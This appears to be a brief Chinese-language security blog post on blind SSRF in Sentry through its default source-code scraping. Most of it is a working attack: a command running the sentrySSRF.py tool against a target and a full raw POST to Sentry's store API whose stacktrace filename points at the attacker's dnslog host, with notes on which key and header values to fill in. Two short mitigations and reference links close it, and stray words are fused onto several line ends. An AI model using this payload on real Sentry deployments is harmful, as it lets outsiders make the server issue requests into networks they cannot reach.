通常在url上看到到有sentry均可以用Sentry(是一個實時事件日誌記錄和聚合平臺)的exp試試,原理是因爲sentry默認開啓source code scrapping ,致使能夠從外部進行blind ssrf請求。javascript
(python3) ➜ sentrySSRF git:(master) python sentrySSRF.py -i http://【your target url】 -d Found Sentry: https://ef00ffc3xxxxxe5b60afff8c138c77e@【your target url】/1 Enter your burpcollaborator address:【your dnslog】
而後去你到dnslog看看有沒有請求記錄便可。html
POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2f3.15.0&sentry_key=【your key】 HTTP/1.1 Host: 【your target url】.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: zh-CN,zh;q=0.9 Content-type: application/json Origin:【隨意domain】 Content-Length: 329 {"project":"30","logger":"javascript","platform":"javascript","exception":{"values":[{"type":"Error","value":"Trying to get control scope but angular isn't ready yet or something like this","stacktrace":{"frames":[{"filename":"http://【your dnslog】","lineno":110,"colno":81071,"function":"XMLHttpRequest.o","in_app":true}]}}]}}
sentry_version = 紅線2 (報錯能夠手動修改幾個其餘版本試試)
sentry_key = Raven.config 紅線1
origin = 能夠隨便寫java
一、sentry關閉 source code scrapping;
二、保證配置文件中的黑名單不爲空:/sentry/conf/server.pypython
https://hackerone.com/reports/374737
https://github.com/xawdxawdx/sentrySSRFgit